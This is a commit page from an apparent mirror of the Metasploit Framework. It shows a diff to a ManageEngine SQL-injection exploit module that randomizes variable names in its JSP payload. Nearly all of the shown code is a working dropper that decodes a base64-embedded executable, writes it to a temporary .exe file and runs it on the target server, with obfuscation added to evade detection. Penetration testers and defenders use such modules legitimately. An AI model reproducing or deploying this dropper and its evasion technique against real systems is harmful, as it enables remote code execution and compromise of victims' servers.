infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Randomize variable names

unstable
sinn3r 2012-10-23 11:41:53 -05:00
parent 923ffe277d
commit bc3472a9b9
1 changed files with 20 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
modules/exploits/windows/http/manageengine_search_sqli.rb
View File

@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# Generate a download+exe JSP payload
# Embeds our executable in JSP
#
def generate_jsp_payload
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
@ -94,27 +94,35 @@ class Metasploit3 < Msf::Exploit::Remote
native_payload = Rex::Text.encode_base64(generate_payload_exe)
native_payload_name = rand_text_alpha(rand(6)+3)
var_raw = Rex::Text.rand_text_alpha(rand(8) + 3)
var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3)
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
var_proc = Rex::Text.rand_text_alpha(rand(8) + 3)
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
byte[] shellcode = null;
BufferedOutputStream outstream = null;
byte[] #{var_raw} = null;
BufferedOutputStream #{var_ostream} = null;
try {
String buf = "#{native_payload}";
String #{var_buf} = "#{native_payload}";
BASE64Decoder decoder = new BASE64Decoder();
shellcode = decoder.decodeBuffer(buf.toString());
BASE64Decoder #{var_decoder} = new BASE64Decoder();
#{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
File temp = File.createTempFile("#{native_payload_name}", ".exe");
String path = temp.getAbsolutePath();
File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".exe");
String #{var_path} = #{var_tmp}.getAbsolutePath();
outstream = new BufferedOutputStream(new FileOutputStream(path));
outstream.write(shellcode);
outstream.close();
#{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
Process p = Runtime.getRuntime().exec(path);
Process #{var_proc} = Runtime.getRuntime().exec(#{var_path});
} catch (Exception e) {}
%>
|